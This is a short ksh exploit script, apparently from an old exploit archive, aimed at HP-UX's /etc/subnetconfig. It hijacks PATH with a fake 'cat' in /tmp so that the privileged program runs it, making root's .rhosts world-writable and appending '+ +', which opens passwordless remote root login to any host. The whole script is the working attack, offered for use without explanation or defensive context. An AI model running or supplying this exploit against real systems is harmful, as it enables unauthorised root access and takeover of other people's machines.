#!/bin/ksh
#
# http://www.anticode.com  for the latest exploits, tools and documents!
#
# /etc/subnetconfig for HP-UX
#

echo '#!/bin/ksh' > /tmp/cat
echo 'chmod 666 ~root/.rhosts' >> /tmp/cat
echo 'echo + + >> ~root/.rhosts' >> /tmp/cat
chmod 777 /tmp/cat
PATH=/tmp:$PATH
export PATH
/etc/subnetconfig
rm /tmp/cat
